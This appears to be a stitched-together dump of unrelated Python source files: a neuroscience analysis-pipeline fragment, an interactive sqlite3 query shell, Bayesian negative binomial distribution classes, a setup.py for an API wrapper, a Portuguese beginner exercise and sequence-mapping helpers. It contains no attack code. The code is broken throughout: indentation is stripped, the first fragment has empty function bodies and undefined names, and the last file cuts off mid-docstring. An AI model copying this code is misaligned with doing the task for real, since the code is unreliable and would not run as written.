motion_correction_v = None, alignment_v = None,
source_extraction_v = None,component_evaluation_v=None,
selected_rows = None, parameters = None):
self.data=data_configuration(mouse,session,trial,is_rest,decoding_v, cropping_v,
motion_correction_v, alignment_v, source_extraction_v,component_evaluation_v)
self.step_index = self.data.data_structure.get_step_index(step)
self.step = step
self.index = self.data.index_assignation()
self.parameters = self.data.get_parameters(self.step) if self.step_index != 0 else None
# If provided, update them with the forced parameters
if parameters != None:
self.parameters.update(parameters)
## select the state of analysis
self.selected_rows = self.data.select(self.step)
# If provided and the rows are a pandas data frame, update them with the selected rows
if selected_rows != None and type(selected_rows) == pd.core.frame.DataFrame:
self.selected_rows.update(selected_rows)
if self.selected_rows.empty:
logging.error('No analysis states. Cancelling')
return
# analysis states dataframe
# states_df = db.open_analysis_states_database()
## I AM HERE
def version_setting(self):
analysis_version = self.data.version_assignation()
db_states=self.data.data_structure.open_database()
#if analysis_version[step]== None:
#data_structure_len = len(self.data.data_structure.data)
#version_len = len(self.data.data_structure.analysis)
#common_name = db_states.loc[:data_structure_len + self.step_index]
#max_version = common_name.reset_index().sort_values(by self.data.data_structure.data_analysis[version_len + self.step_index:]).iloc[-1].loc[f'{step}_v']
#logging.debug(f'Max. version for step: {step}, input analysis state: {index[:len(variables.data_structure) + step_index]} is {max_version}')
#index = list(index) ; index[len(variables.data_structure) + step_index] = max_version + 1 ; index = tuple(index)
### this method creates a string with the right name for the file, using mouse, session, trial, is_rest and analysis version information.
def file_handler(self):
# LOGGING
# create file handler which logs even debug messages
step_data_dir = f'{self.step}/' if self.step_index != 4 else (f'{self.step}/session_wise/' if self.parameters['session_wise'] else f'{step}/trial_wise/')
log_file_path = f'data/interim/{step_data_dir}meta/log/{self.data.create_file_name(self.step)}.log'
print(log_file_path)
fh = logging.FileHandler(log_file_path); fh.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter("%(relativeCreated)12d [%(filename)s:%(funcName)20s():%(lineno)s]"\
"[%(process)d] %(message)s")
fh.setFormatter(formatter)
# add the handlers to the logger
logging.root.addHandler(fh)
def server_step(self):
server_step_indices = [2,3,4,5]
if self.step_index in server_step_indices: # server step index is defined in this function and is equal 2,3,4,5
# Cluster mangement for steps performed on the server: motion correction,
# alignment, source extraction, component evaluation
# Stop the cluster if one exists
n_processes = psutil.cpu_count()
cm.cluster.stop_server()
# Start a new cluster
c, dview, n_processes = cm.cluster.setup_cluster(backend='local',
n_processes=n_processes, # number of process to use, if you go out of memory try to reduce this one
single_thread=False)
logging.info(f'Starting cluster. n_processes = {n_processes}.')
return c, dview,n_processes
def confirm_analysis(self,check_rows=None):
if check_rows:
# Ask for a final confirmation after selecting analysis states and parameters.
print(f'Perform {step} on these states?')
continue_step = ''
while continue_step != 'yes' and continue_step != 'no':
print("Type 'yes' or 'no'")
continue_step = input()
if continue_step == 'no':
print(f'Cancelling {step}.')
return
print(f'Continuing with {step}.')
def decoding(self,decoding_v):
def cropping(self,decoding_v,cropping_v):
def motion_correction(self,decofing_v,cropping_v,motion_correction_v):
def alignment(self,decofing_v,cropping_v,motion_correction_v,alignment_v):
def source_extraction(self,decofing_v,cropping_v,motion_correction_v,alignment_v,sourse_extraction_v):
def component_evaluation(self,decofing_v,cropping_v,motion_correction_v,alignment_v,sourse_extraction_v,component_evaluation):
| nilq/baby-python | python |
import sqlite3
con = sqlite3.connect("danbooru2019.db")
con.isolation_level = None
cur = con.cursor()
buffer = ""
print ("Enter your SQL commands to execute in sqlite3; terminated with semicolon (;)")
print ("Enter a blank line to exit.")
while True:
line = input()
if line == "":
break
buffer += line
if sqlite3.complete_statement(buffer):
try:
buffer = buffer.strip()
cur.execute(buffer)
start = buffer.lstrip().upper()
if (start.startswith("SELECT") or start.startswith("EXPLAIN")): # allow explain query plan
res = cur.fetchall()
print(res)
except sqlite3.Error as e:
print ("An error occurred:", e.args[0])
buffer = ""
con.close() | nilq/baby-python | python |
from __future__ import division
from builtins import zip
from builtins import range
from builtins import object
__all__ = [
'NegativeBinomial', 'NegativeBinomialFixedR', 'NegativeBinomialIntegerR2',
'NegativeBinomialIntegerR', 'NegativeBinomialFixedRVariant',
'NegativeBinomialIntegerRVariant', 'NegativeBinomialIntegerRVariant',
'NegativeBinomialIntegerR2Variant']
import numpy as np
from numpy import newaxis as na
import scipy.special as special
from scipy.special import logsumexp
from warnings import warn
from pybasicbayes.abstractions import Distribution, GibbsSampling, \
MeanField, MeanFieldSVI, MaxLikelihood
from pybasicbayes.util.stats import getdatasize, flattendata, \
sample_discrete_from_log, sample_discrete, atleast_2d
try:
from pybasicbayes.util.cstats import sample_crp_tablecounts
except ImportError:
warn('using slow sample_crp_tablecounts')
from pybasicbayes.util.stats import sample_crp_tablecounts
class _NegativeBinomialBase(Distribution):
'''
Negative Binomial distribution with a conjugate beta prior on p and a
separate gamma prior on r. The parameter r does not need to be an integer.
If r is an integer, then x ~ NegBin(r,p) is the same as
x = np.random.geometric(1-p,size=r).sum() - r
where r is subtracted to make the geometric support be {0,1,2,...}
Mean is r*p/(1-p), var is r*p/(1-p)**2
Uses the data augemntation sampling method from Zhou et al. ICML 2012
NOTE: the support is {0,1,2,...}.
Hyperparameters:
k_0, theta_0: r ~ Gamma(k, theta)
or r = np.random.gamma(k,theta)
alpha_0, beta_0: p ~ Beta(alpha,beta)
or p = np.random.beta(alpha,beta)
Parameters:
r
p
'''
def __init__(self,r=None,p=None,k_0=None,theta_0=None,alpha_0=None,beta_0=None):
self.r = r
self.p = p
self.k_0 = k_0
self.theta_0 = theta_0
self.alpha_0 = alpha_0
self.beta_0 = beta_0
if r is p is None and not any(_ is None for _ in (k_0,theta_0,alpha_0,beta_0)):
self.resample() # intialize from prior
@property
def params(self):
return dict(r=self.r,p=self.p)
@property
def hypparams(self):
return dict(k_0=self.k_0,theta_0=self.theta_0,
alpha_0=self.alpha_0,beta_0=self.beta_0)
def log_likelihood(self,x,r=None,p=None):
r = r if r is not None else self.r
p = p if p is not None else self.p
x = np.array(x,ndmin=1)
if self.p > 0:
xnn = x[x >= 0]
raw = np.empty(x.shape)
raw[x>=0] = special.gammaln(r + xnn) - special.gammaln(r) \
- special.gammaln(xnn+1) + r*np.log(1-p) + xnn*np.log(p)
raw[x<0] = -np.inf
return raw if isinstance(x,np.ndarray) else raw[0]
else:
raw = np.log(np.zeros(x.shape))
raw[x == 0] = 0.
return raw if isinstance(x,np.ndarray) else raw[0]
def log_sf(self,x):
scalar = not isinstance(x,np.ndarray)
x = np.atleast_1d(x)
errs = np.seterr(divide='ignore')
ret = np.log(special.betainc(x+1,self.r,self.p))
np.seterr(**errs)
ret[x < 0] = np.log(1.)
if scalar:
return ret[0]
else:
return ret
def rvs(self,size=None):
return np.random.poisson(np.random.gamma(self.r,self.p/(1-self.p),size=size))
class NegativeBinomial(_NegativeBinomialBase, GibbsSampling):
def resample(self,data=[],niter=20):
if getdatasize(data) == 0:
self.p = np.random.beta(self.alpha_0,self.beta_0)
self.r = np.random.gamma(self.k_0,self.theta_0)
else:
data = atleast_2d(flattendata(data))
N = len(data)
for itr in range(niter):
### resample r
msum = sample_crp_tablecounts(self.r,data).sum()
self.r = np.random.gamma(self.k_0 + msum, 1/(1/self.theta_0 - N*np.log(1-self.p)))
### resample p
self.p = np.random.beta(self.alpha_0 + data.sum(), self.beta_0 + N*self.r)
return self
def resample_python(self,data=[],niter=20):
if getdatasize(data) == 0:
self.p = np.random.beta(self.alpha_0,self.beta_0)
self.r = np.random.gamma(self.k_0,self.theta_0)
else:
data = flattendata(data)
N = len(data)
for itr in range(niter):
### resample r
msum = 0.
for n in data:
msum += (np.random.rand(n) < self.r/(np.arange(n)+self.r)).sum()
self.r = np.random.gamma(self.k_0 + msum, 1/(1/self.theta_0 - N*np.log(1-self.p)))
### resample p
self.p = np.random.beta(self.alpha_0 + data.sum(), self.beta_0 + N*self.r)
return self
### OLD unused alternatives
def resample_logseriesaug(self,data=[],niter=20):
# an alternative algorithm, kind of opaque and no advantages...
if getdatasize(data) == 0:
self.p = np.random.beta(self.alpha_0,self.beta_0)
self.r = np.random.gamma(self.k_0,self.theta_0)
else:
data = flattendata(data)
N = data.shape[0]
logF = self.logF
L_i = np.zeros(N)
data_nz = data[data > 0]
for itr in range(niter):
logR = np.arange(1,logF.shape[1]+1)*np.log(self.r) + logF
L_i[data > 0] = sample_discrete_from_log(logR[data_nz-1,:data_nz.max()],axis=1)+1
self.r = np.random.gamma(self.k_0 + L_i.sum(), 1/(1/self.theta_0 - np.log(1-self.p)*N))
self.p = np.random.beta(self.alpha_0 + data.sum(), self.beta_0 + N*self.r)
return self
@classmethod
def _set_up_logF(cls):
if not hasattr(cls,'logF'):
# actually indexes logF[0,0] to correspond to log(F(1,1)) in Zhou
# paper, but keeps track of that alignment with the other code!
# especially arange(1,...), only using nonzero data and shifting it
SIZE = 500
logF = -np.inf * np.ones((SIZE,SIZE))
logF[0,0] = 0.
for m in range(1,logF.shape[0]):
prevrow = np.exp(logF[m-1] - logF[m-1].max())
logF[m] = np.log(np.convolve(prevrow,[0,m,1],'same')) + logF[m-1].max()
cls.logF = logF
class NegativeBinomialFixedR(_NegativeBinomialBase, GibbsSampling, MeanField, MeanFieldSVI, MaxLikelihood):
def __init__(self,r=None,p=None,alpha_0=None,beta_0=None,alpha_mf=None,beta_mf=None):
self.p = p
self.r = r
self.alpha_0 = alpha_0
self.beta_0 = beta_0
if p is None and not any(_ is None for _ in (alpha_0,beta_0)):
self.resample() # intialize from prior
if not any(_ is None for _ in (alpha_mf,beta_mf)):
self.alpha_mf = alpha_mf
self.beta_mf = beta_mf
@property
def hypparams(self):
return dict(alpha_0=self.alpha_0,beta_0=self.beta_0)
@property
def natural_hypparam(self):
return np.array([self.alpha_0,self.beta_0]) - 1
@natural_hypparam.setter
def natural_hypparam(self,natparam):
self.alpha_0, self.beta_0 = natparam + 1
### Mean Field
def _resample_from_mf(self):
self.p = np.random.beta(self.alpha_mf,self.beta_mf)
return self
def meanfieldupdate(self,data,weights):
self.alpha_mf, self.beta_mf = \
self._posterior_hypparams(*self._get_weighted_statistics(data,weights))
self.p = self.alpha_mf / (self.alpha_mf + self.beta_mf)
def meanfield_sgdstep(self,data,weights,prob,stepsize):
alpha_new, beta_new = \
self._posterior_hypparams(*(
1./prob * self._get_weighted_statistics(data,weights)))
self.alpha_mf = (1-stepsize)*self.alpha_mf + stepsize*alpha_new
self.beta_mf = (1-stepsize)*self.beta_mf + stepsize*beta_new
self.p = self.alpha_mf / (self.alpha_mf + self.beta_mf)
def get_vlb(self):
Elnp, Eln1mp = self._mf_expected_statistics()
p_avgengy = (self.alpha_0-1)*Elnp + (self.beta_0-1)*Eln1mp \
- (special.gammaln(self.alpha_0) + special.gammaln(self.beta_0)
- special.gammaln(self.alpha_0 + self.beta_0))
q_entropy = special.betaln(self.alpha_mf,self.beta_mf) \
- (self.alpha_mf-1)*special.digamma(self.alpha_mf) \
- (self.beta_mf-1)*special.digamma(self.beta_mf) \
+ (self.alpha_mf+self.beta_mf-2)*special.digamma(self.alpha_mf+self.beta_mf)
return p_avgengy + q_entropy
def _mf_expected_statistics(self):
Elnp, Eln1mp = special.digamma([self.alpha_mf,self.beta_mf]) \
- special.digamma(self.alpha_mf + self.beta_mf)
return Elnp, Eln1mp
def expected_log_likelihood(self,x):
Elnp, Eln1mp = self._mf_expected_statistics()
x = np.atleast_1d(x)
errs = np.seterr(invalid='ignore')
out = x*Elnp + self.r*Eln1mp + self._log_base_measure(x,self.r)
np.seterr(**errs)
out[np.isnan(out)] = -np.inf
return out if out.shape[0] > 1 else out[0]
@staticmethod
def _log_base_measure(x,r):
return special.gammaln(x+r) - special.gammaln(x+1) - special.gammaln(r)
### Gibbs
def resample(self,data=[]):
self.p = np.random.beta(*self._posterior_hypparams(*self._get_statistics(data)))
# set mean field params to something reasonable for initialization
fakedata = self.rvs(10)
self.alpha_mf, self.beta_mf = self._posterior_hypparams(*self._get_statistics(fakedata))
### Max likelihood
def max_likelihood(self,data,weights=None):
if weights is None:
n, tot = self._get_statistics(data)
else:
n, tot = self._get_weighted_statistics(data,weights)
self.p = (tot/n) / (self.r + tot/n)
return self
### Statistics and posterior hypparams
def _get_statistics(self,data):
if getdatasize(data) == 0:
n, tot = 0, 0
elif isinstance(data,np.ndarray):
assert np.all(data >= 0)
data = np.atleast_1d(data)
n, tot = data.shape[0], data.sum()
elif isinstance(data,list):
assert all(np.all(d >= 0) for d in data)
n = sum(d.shape[0] for d in data)
tot = sum(d.sum() for d in data)
else:
assert np.isscalar(data)
n = 1
tot = data
return np.array([n, tot])
def _get_weighted_statistics(self,data,weights):
if isinstance(weights,np.ndarray):
assert np.all(data >= 0) and data.ndim == 1
n, tot = weights.sum(), weights.dot(data)
else:
assert all(np.all(d >= 0) for d in data)
n = sum(w.sum() for w in weights)
tot = sum(w.dot(d) for d,w in zip(data,weights))
return np.array([n, tot])
def _posterior_hypparams(self,n,tot):
return np.array([self.alpha_0 + tot, self.beta_0 + n*self.r])
class NegativeBinomialIntegerR2(_NegativeBinomialBase,MeanField,MeanFieldSVI,GibbsSampling):
# NOTE: this class should replace NegativeBinomialFixedR completely...
_fixedr_class = NegativeBinomialFixedR
def __init__(self,alpha_0=None,beta_0=None,alphas_0=None,betas_0=None,
r_support=None,r_probs=None,r_discrete_distn=None,
r=None,ps=None):
assert (r_discrete_distn is not None) ^ (r_support is not None and r_probs is not None)
if r_discrete_distn is not None:
r_support, = np.where(r_discrete_distn)
r_probs = r_discrete_distn[r_support]
r_support += 1
self.r_support = np.asarray(r_support)
self.rho_0 = self.rho_mf = np.log(r_probs)
assert (alpha_0 is not None and beta_0 is not None) \
^ (alphas_0 is not None and betas_0 is not None)
alphas_0 = alphas_0 if alphas_0 is not None else [alpha_0]*len(r_support)
betas_0 = betas_0 if betas_0 is not None else [beta_0]*len(r_support)
ps = ps if ps is not None else [None]*len(r_support)
self._fixedr_distns = \
[self._fixedr_class(r=r,p=p,alpha_0=alpha_0,beta_0=beta_0)
for r,p,alpha_0,beta_0 in zip(r_support,ps,alphas_0,betas_0)]
# for init
self.ridx = sample_discrete(r_probs)
self.r = r_support[self.ridx]
def __repr__(self):
return 'NB(r=%d,p=%0.3f)' % (self.r,self.p)
@property
def alphas_0(self):
return np.array([d.alpha_0 for d in self._fixedr_distns]) \
if len(self._fixedr_distns) > 0 else None
@property
def betas_0(self):
return np.array([d.beta_0 for d in self._fixedr_distns]) \
if len(self._fixedr_distns) > 0 else None
@property
def p(self):
return self._fixedr_distns[self.ridx].p
@p.setter
def p(self,val):
self._fixedr_distns[self.ridx].p = val
def _resample_from_mf(self):
self._resample_r_from_mf()
self._resample_p_from_mf()
def _resample_r_from_mf(self):
lognorm = logsumexp(self.rho_mf)
self.ridx = sample_discrete(np.exp(self.rho_mf - lognorm))
self.r = self.r_support[self.ridx]
def _resample_p_from_mf(self):
d = self._fixedr_distns[self.ridx]
self.p = np.random.beta(d.alpha_mf,d.beta_mf)
def get_vlb(self):
return self._r_vlb() + sum(np.exp(rho)*d.get_vlb()
for rho,d in zip(self.rho_mf,self._fixedr_distns))
def _r_vlb(self):
return np.exp(self.rho_mf).dot(self.rho_0) \
- np.exp(self.rho_mf).dot(self.rho_mf)
def meanfieldupdate(self,data,weights):
for d in self._fixedr_distns:
d.meanfieldupdate(data,weights)
self._update_rho_mf(data,weights)
# everything below here is for plotting
ridx = self.rho_mf.argmax()
d = self._fixedr_distns[ridx]
self.r = d.r
self.p = d.alpha_mf / (d.alpha_mf + d.beta_mf)
def _update_rho_mf(self,data,weights):
self.rho_mf = self.rho_0.copy()
for idx, d in enumerate(self._fixedr_distns):
n, tot = d._get_weighted_statistics(data,weights)
Elnp, Eln1mp = d._mf_expected_statistics()
self.rho_mf[idx] += (d.alpha_0-1+tot)*Elnp + (d.beta_0-1+n*d.r)*Eln1mp
if isinstance(data,np.ndarray):
self.rho_mf[idx] += weights.dot(d._log_base_measure(data,d.r))
else:
self.rho_mf[idx] += sum(w.dot(d._log_base_measure(dt,d.r))
for dt,w in zip(data,weights))
def expected_log_likelihood(self,x):
lognorm = logsumexp(self.rho_mf)
return sum(np.exp(rho-lognorm)*d.expected_log_likelihood(x)
for rho,d in zip(self.rho_mf,self._fixedr_distns))
def meanfield_sgdstep(self,data,weights,prob,stepsize):
rho_mf_orig = self.rho_mf.copy()
if isinstance(data,np.ndarray):
self._update_rho_mf(data,prob*weights)
else:
self._update_rho_mf(data,[w*prob for w in weights])
rho_mf_new = self.rho_mf
for d in self._fixedr_distns:
d.meanfield_sgdstep(data,weights,prob,stepsize)
self.rho_mf = (1-stepsize)*rho_mf_orig + stepsize*rho_mf_new
# for plotting
ridx = self.rho_mf.argmax()
d = self._fixedr_distns[ridx]
self.r = d.r
self.p = d.alpha_mf / (d.alpha_mf + d.beta_mf)
def resample(self,data=[]):
self._resample_r(data) # marginalizes out p values
self._resample_p(data) # resample p given sampled r
return self
def _resample_r(self,data):
self.ridx = sample_discrete(
self._posterior_hypparams(self._get_statistics(data)))
self.r = self.r_support[self.ridx]
return self
def _resample_p(self,data):
self._fixedr_distns[self.ridx].resample(data)
return self
def _get_statistics(self,data=[]):
n, tot = self._fixedr_distns[0]._get_statistics(data)
if n > 0:
data = flattendata(data)
alphas_n, betas_n = self.alphas_0 + tot, self.betas_0 + self.r_support*n
log_marg_likelihoods = \
special.betaln(alphas_n, betas_n) \
- special.betaln(self.alphas_0, self.betas_0) \
+ (special.gammaln(data[:,na]+self.r_support)
- special.gammaln(data[:,na]+1) \
- special.gammaln(self.r_support)).sum(0)
else:
log_marg_likelihoods = np.zeros_like(self.r_support)
return log_marg_likelihoods
def _posterior_hypparams(self,log_marg_likelihoods):
log_posterior_discrete = self.rho_0 + log_marg_likelihoods
return np.exp(log_posterior_discrete - log_posterior_discrete.max())
class NegativeBinomialIntegerR(NegativeBinomialFixedR, GibbsSampling, MaxLikelihood):
'''
Nonconjugate Discrete+Beta prior
r_discrete_distribution is an array where index i is p(r=i+1)
'''
def __init__(self,r_discrete_distn=None,r_support=None,
alpha_0=None,beta_0=None,r=None,p=None):
self.r_support = r_support
self.r_discrete_distn = r_discrete_distn
self.alpha_0 = alpha_0
self.beta_0 = beta_0
self.r = r
self.p = p
if r is p is None \
and not any(_ is None for _ in (r_discrete_distn,alpha_0,beta_0)):
self.resample() # intialize from prior
@property
def hypparams(self):
return dict(r_discrete_distn=self.r_discrete_distn,
alpha_0=self.alpha_0,beta_0=self.beta_0)
def get_r_discrete_distn(self):
return self._r_discrete_distn
def set_r_discrete_distn(self,r_discrete_distn):
if r_discrete_distn is not None:
r_discrete_distn = np.asarray(r_discrete_distn,dtype=np.float)
r_support, = np.where(r_discrete_distn)
r_probs = r_discrete_distn[r_support]
r_probs /= r_probs.sum()
r_support += 1 # r_probs[0] corresponds to r=1
self.r_support = r_support
self.r_probs = r_probs
self._r_discrete_distn = r_discrete_distn
r_discrete_distn = property(get_r_discrete_distn,set_r_discrete_distn)
def rvs(self,size=None):
out = np.random.geometric(1-self.p,size=size)-1
for i in range(self.r-1):
out += np.random.geometric(1-self.p,size=size)-1
return out
def resample(self,data=[]):
alpha_n, betas_n, posterior_discrete = self._posterior_hypparams(
*self._get_statistics(data))
r_idx = sample_discrete(posterior_discrete)
self.r = self.r_support[r_idx]
self.p = np.random.beta(alpha_n, betas_n[r_idx])
# NOTE: this class has a conjugate prior even though it's not in the
# exponential family, so I wrote _get_statistics and _get_weighted_statistics
# (which integrate out p) for the resample() and meanfield_update() methods,
# though these aren't statistics in the exponential family sense
def _get_statistics(self,data):
# NOTE: since this isn't really in exponential family, this method needs
# to look at hyperparameters. form posterior hyperparameters for the p
# parameters here so we can integrate them out and get the r statistics
n, tot = super(NegativeBinomialIntegerR,self)._get_statistics(data)
if n > 0:
alpha_n, betas_n = self.alpha_0 + tot, self.beta_0 + self.r_support*n
data = flattendata(data)
log_marg_likelihoods = \
special.betaln(alpha_n, betas_n) \
- special.betaln(self.alpha_0, self.beta_0) \
+ (special.gammaln(data[:,na]+self.r_support)
- special.gammaln(data[:,na]+1) \
- special.gammaln(self.r_support)).sum(0)
else:
log_marg_likelihoods = np.zeros_like(self.r_support)
return n, tot, log_marg_likelihoods
def _get_weighted_statistics(self,data,weights):
n, tot = super(NegativeBinomialIntegerR,self)._get_weighted_statistics(data,weights)
if n > 0:
alpha_n, betas_n = self.alpha_0 + tot, self.beta_0 + self.r_support*n
data, weights = flattendata(data), flattendata(weights)
log_marg_likelihoods = \
special.betaln(alpha_n, betas_n) \
- special.betaln(self.alpha_0, self.beta_0) \
+ (special.gammaln(data[:,na]+self.r_support)
- special.gammaln(data[:,na]+1) \
- special.gammaln(self.r_support)).dot(weights)
else:
log_marg_likelihoods = np.zeros_like(self.r_support)
return n, tot, log_marg_likelihoods
def _posterior_hypparams(self,n,tot,log_marg_likelihoods):
alpha_n = self.alpha_0 + tot
betas_n = self.beta_0 + n*self.r_support
log_posterior_discrete = np.log(self.r_probs) + log_marg_likelihoods
posterior_discrete = np.exp(log_posterior_discrete - log_posterior_discrete.max())
return alpha_n, betas_n, posterior_discrete
def max_likelihood(self,data,weights=None,stats=None):
if stats is not None:
n, tot = stats
elif weights is None:
n, tot = super(NegativeBinomialIntegerR,self)._get_statistics(data)
else:
n, tot = super(NegativeBinomialIntegerR,self)._get_weighted_statistics(data,weights)
if n > 1:
rs = self.r_support
ps = self._max_likelihood_ps(n,tot,rs)
# TODO TODO this isn't right for weighted data: do weighted sums
if isinstance(data,np.ndarray):
likelihoods = np.array([self.log_likelihood(data,r=r,p=p).sum()
for r,p in zip(rs,ps)])
else:
likelihoods = np.array([sum(self.log_likelihood(d,r=r,p=p).sum()
for d in data) for r,p in zip(rs,ps)])
argmax = likelihoods.argmax()
self.r = self.r_support[argmax]
self.p = ps[argmax]
return self
def _log_base_measure(self,data):
return [(special.gammaln(r+data) - special.gammaln(r) - special.gammaln(data+1)).sum()
for r in self.r_support]
def _max_likelihood_ps(self,n,tot,rs):
ps = (tot/n) / (rs + tot/n)
assert (ps >= 0).all()
return ps
class _StartAtRMixin(object):
def log_likelihood(self,x,**kwargs):
r = kwargs['r'] if 'r' in kwargs else self.r
return super(_StartAtRMixin,self).log_likelihood(x-r,**kwargs)
def log_sf(self,x,**kwargs):
return super(_StartAtRMixin,self).log_sf(x-self.r,**kwargs)
def expected_log_likelihood(self,x,**kwargs):
r = kwargs['r'] if 'r' in kwargs else self.r
return super(_StartAtRMixin,self).expected_log_likelihood(x-r,**kwargs)
def rvs(self,size=[]):
return super(_StartAtRMixin,self).rvs(size)+self.r
class NegativeBinomialFixedRVariant(_StartAtRMixin,NegativeBinomialFixedR):
def _get_statistics(self,data):
n, tot = super(NegativeBinomialFixedRVariant,self)._get_statistics(data)
n, tot = n, tot-n*self.r
assert tot >= 0
return np.array([n, tot])
def _get_weighted_statistics(self,data,weights):
n, tot = super(NegativeBinomialFixedRVariant,self)._get_weighted_statistics(data,weights)
n, tot = n, tot-n*self.r
assert tot >= 0
return np.array([n, tot])
class NegativeBinomialIntegerRVariant(NegativeBinomialIntegerR):
def resample(self,data=[]):
n, alpha_n, posterior_discrete, r_support = self._posterior_hypparams(
*self._get_statistics(data)) # NOTE: pass out r_support b/c feasible subset
self.r = r_support[sample_discrete(posterior_discrete)]
self.p = np.random.beta(alpha_n - n*self.r, self.beta_0 + n*self.r)
def _get_statistics(self,data):
n = getdatasize(data)
if n > 0:
data = flattendata(data)
feasible = self.r_support <= data.min()
assert np.any(feasible)
r_support = self.r_support[feasible]
normalizers = (special.gammaln(data[:,na]) - special.gammaln(data[:,na]-r_support+1)
- special.gammaln(r_support)).sum(0)
return n, data.sum(), normalizers, feasible
else:
return n, None, None, None
def _posterior_hypparams(self,n,tot,normalizers,feasible):
if n == 0:
return n, self.alpha_0, self.r_probs, self.r_support
else:
r_probs = self.r_probs[feasible]
r_support = self.r_support[feasible]
log_marg_likelihoods = special.betaln(self.alpha_0 + tot - n*r_support,
self.beta_0 + r_support*n) \
- special.betaln(self.alpha_0, self.beta_0) \
+ normalizers
log_marg_probs = np.log(r_probs) + log_marg_likelihoods
log_marg_probs -= log_marg_probs.max()
marg_probs = np.exp(log_marg_probs)
return n, self.alpha_0 + tot, marg_probs, r_support
def _max_likelihood_ps(self,n,tot,rs):
ps = 1-(rs*n)/tot
assert (ps >= 0).all()
return ps
def rvs(self,size=[]):
return super(NegativeBinomialIntegerRVariant,self).rvs(size) + self.r
class NegativeBinomialIntegerR2Variant(NegativeBinomialIntegerR2):
_fixedr_class = NegativeBinomialFixedRVariant
def _update_rho_mf(self,data,weights):
self.rho_mf = self.rho_0.copy()
for idx, d in enumerate(self._fixedr_distns):
n, tot = d._get_weighted_statistics(data,weights)
Elnp, Eln1mp = d._mf_expected_statistics()
self.rho_mf[idx] += (d.alpha_0-1+tot)*Elnp + (d.beta_0-1+n*d.r)*Eln1mp
self.rho_mf_temp = self.rho_mf.copy()
# NOTE: this method only needs to override parent in the base measure
# part, i.e. data -> data-r
if isinstance(data,np.ndarray):
self.rho_mf[idx] += weights.dot(d._log_base_measure(data-d.r,d.r))
else:
self.rho_mf[idx] += sum(w.dot(d._log_base_measure(dt-d.r,d.r))
for dt,w in zip(data,weights))
| nilq/baby-python | python |
from setuptools import find_packages, setup
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="py-royale",
version="0.1.0",
author="Kenan Džindo",
description="Asynchronous wrapper for the official Supercell Clash Royale API.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dzindo/PyRoyale",
project_urls={"Bug Tracker": "https://github.com/dzindo/PyRoyale/issues"},
install_requires=["aiohttp>=3.7.4"],
keywords=["supercell", "api", "asynchronous", "clash royale", "api wrapper", "asyncio", "aiohttp"],
license="MIT",
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: Unix",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
],
packages=find_packages(),
python_requires=">=3.7.0",
)
| nilq/baby-python | python |
print('=== DESAFIO 011 ===')
print('Faça um programa que leia a largura e a altura de uma parede em metros, calcule a sua área \ne a quantidade de tinta necessária para pintá-la, sabendo que cada litro de tinta pinta uma área de 2m²:')
L = float(input('Digite a largura da parede: '))
A = float(input('Digite a altura da parede: '))
ÁREA = L*A
LITROS = ÁREA / 2
print(f'Sua parede tem a dimensão de {L}m x {A}m e sua área é de {ÁREA}m². Para pintá-la, você irá precisar de {LITROS:.2f} litros de tinta.')
| nilq/baby-python | python |
from pad import pad1d, pad2d
def map_sequence(seq, sequence_map, unk_item_id):
""" Transform a splitted sequence of items into another sequence of items
according to the rules encoded in the dict item2id
seq: iterable
sequence_map: dict
unk_item_id: int"""
item_ids = []
for item in seq:
item_id = sequence_map.get(item, unk_item_id)
item_ids.append(item_id)
return item_ids
def map_sequences(sequences, sequence_map, unk_item_id):
"""Transform a list of sequences into another one, according to
the rules encoded in sequence map"""
mapped_sequences = []
for seq in sequences:
mapped_sequence = map_sequence(seq, sequence_map, unk_item_id)
mapped_sequences.append(mapped_sequence)
return mapped_sequences
def split_map_sequence(seq, sequence_map, unk_item_id, seq_splitter):
""" Transform a sequence of items into another sequence of items
according to the rules encoded in the dict item2id.
Example usage: mapping words into their corresponding ids
seq: iterable
sequence_map: dict
unk_item_id: int
seq_splitter: function"""
splitted_seq = seq_splitter(seq)
item_ids = map_sequence(splitted_seq, sequence_map, unk_item_id)
return item_ids
def split_map_sequences(sequences, sequence_map, unk_item_id, seq_splitter):
"""Split the sequences and then transform them into the items specified
by sequence_map"""
splitted_seqs = [seq_splitter(seq) for seq in sequences]
splitted_mapped_seqs = map_sequences(splitted_seqs, sequence_map,
unk_item_id)
return splitted_mapped_seqs
def split_map_pad_sequences(sequences, sequence_map, unk_item_id, pad_id,
seq_splitter):
"""Split, transform (map) and pad a batch of sequences
return the padded and mapped sequences, along with the original lengths
and a mask indicating the real item positions, as opposed to the
paddings"""
splitted_mapped_sequences = split_map_sequences(
sequences, sequence_map, unk_item_id, seq_splitter)
padded_mapped_sequences, lengths, mask = pad1d(
splitted_mapped_sequences, pad_id)
return padded_mapped_sequences, lengths, mask
def split_sequences2d(sequences, seq_splitter_d1, seq_splitter_d2):
"""Split a sequence into its second level hierarchy components
e.g. Split a string into its component words and characters.
[
'a brown cat sat on the red mat',
'a gray fox jumped over the dog',
'Phil saw Feel feel the feels'
]
will become
[
[['a'], ['b', 'r', 'o', 'w', 'n'], ['c', 'a', 't'], ['s', 'a', 't'], ['o', 'n'], ['t', 'h', 'e'], ['r', 'e', 'd'], ['m', 'a', 't']],
[['a'], ['g', 'r', 'a', 'y'], ['f', 'o', 'x'], ['j', 'u', 'm', 'p', 'e', 'd'], ['o', 'v', 'e', 'r'], ['t', 'h', 'e'], ['d', 'o', 'g']],
[['P', 'h', 'i', 'l'], ['s', 'a', 'w'], ['F', 'e', 'e', 'l'], ['f', 'e', 'e', 'l'], ['t', 'h', 'e'], ['f', 'e', 'e', 'l', 's']]
]
This will result in a doubly nested list"""
splitted_seqs_d1 = [seq_splitter_d1(seqs) for seqs in sequences]
splitted_seqs_d2 = []
for splitted_seq_d1 in splitted_seqs_d1:
splitted_seq_d2 = [seq_splitter_d2(seq_d2) for seq_d2
in splitted_seq_d1]
splitted_seqs_d2.append(splitted_seq_d2)
return splitted_seqs_d2
def split_map_sequences2d(sequences, sequence_map_d2, unk_item_id_d2,
seq_splitter_d1, seq_splitter_d2):
"""Split and transform (map) a batch of sequences into its second
hierarchy level, e.g. convert a batch of strings into a batch of
